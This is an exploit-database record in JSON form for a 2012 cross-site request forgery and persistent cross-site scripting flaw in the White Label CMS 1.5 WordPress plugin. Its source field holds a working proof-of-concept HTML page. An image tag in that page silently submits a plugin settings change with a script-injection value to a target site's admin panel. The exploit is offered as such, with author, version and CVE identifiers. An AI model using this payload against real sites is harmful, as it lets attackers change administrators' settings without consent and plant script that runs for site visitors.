White Label CMS v 1.5 CSRF / Persistent XSS

{"type": "zdt", "lastseen": "2016-04-20T01:11:23", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "White Label CMS v 1.5 CSRF / Persistent XSS", "published": "2012-10-21T00:00:00", "href": "http://0day.today/exploit/description/19607", "cvss": {"vector": "NONE", "score": 0}, "description": "CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)", "hash": "b16af2fd3307dc05c76c746a2218be9c367071c3e574cc7a2d2b147151aade13", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS\r\n# Date: 21/10/2012\r\n# Exploit Author: pcsjj\r\n# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/\r\n# Version: 1.5\r\n# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/\r\n# Downloads: 110,313\r\n# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)\r\n \r\n<html>\r\n<title>White Label CMS CSRF</title>\r\n<body>\r\n<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name=\"><script>alert(\"fun\")</script><div\r\n\"'>\r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-19607", "sourceHref": "http://0day.today/exploit/19607", "modified": "2012-10-21T00:00:00", "reporter": "pcsjj", "enchantments": {"vulnersScore": 6.8}}